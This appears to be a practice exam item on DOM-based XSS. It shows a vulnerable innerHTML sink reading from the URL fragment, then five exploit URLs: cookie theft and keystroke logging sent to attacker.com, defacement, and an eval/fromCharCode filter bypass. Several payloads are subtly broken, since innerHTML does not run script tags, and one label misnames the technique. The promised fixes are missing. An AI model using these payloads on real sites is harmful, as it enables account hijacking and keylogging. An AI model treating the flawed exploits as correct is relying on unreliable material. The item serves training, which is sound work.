PBQ 8: Advanced Web Application Security - DOM-Based XSS

Client-Side XSS Exploitation

Szenario

You are testing a modern single-page application (SPA) built with JavaScript. Traditional reflected XSS detection tools are not flagging vulnerabilities, but you suspect DOM-based XSS exists.

Application Details:
- URL: https://example.com/profile
- Framework: Custom JavaScript (no framework)
- Functionality: User profile page that displays user data from URL fragments

Code Snippet Found:
```javascript
function loadUserProfile() {
    let userInput = window.location.hash.substring(1);
    let profileDiv = document.getElementById('profile');
    profileDiv.innerHTML = "Welcome, " + decodeURIComponent(userInput);
}
window.addEventListener('hashchange', loadUserProfile);
```

Your Task:
1. Analyze the code for DOM-based vulnerabilities
2. Craft exploitation payloads
3. Demonstrate impact
4. Recommend secure coding fixes

Anleitung

Identify the vulnerability type, create working exploit payloads, and select proper remediation techniques.

Exploit 1: DOM-Based XSS via innerHTML with URL fragment

Exploit URL: https://example.com/profile#<img src=x onerror=alert(document.cookie)>

Exploit 2: Cookie theft via DOM XSS

Exploit URL: https://example.com/profile#<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

Exploit 3: Keylogger injection via DOM XSS

Exploit URL: https://example.com/profile#<script>document.onkeypress=function(e){fetch('https://attacker.com/log?k='+e.key)}</script>

Exploit 4: Defacement via DOM XSS

Exploit URL: https://example.com/profile#<script>document.body.innerHTML='<h1>Hacked!</h1>'</script>

Exploit 5: WAF bypass using HTML entities

Exploit URL: https://example.com/profile#<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>